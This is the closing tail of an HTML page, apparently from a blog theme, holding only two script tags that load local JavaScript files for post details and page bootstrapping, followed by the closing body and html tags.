<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  

  




  
  

  

  

  

  


</body>
</html>
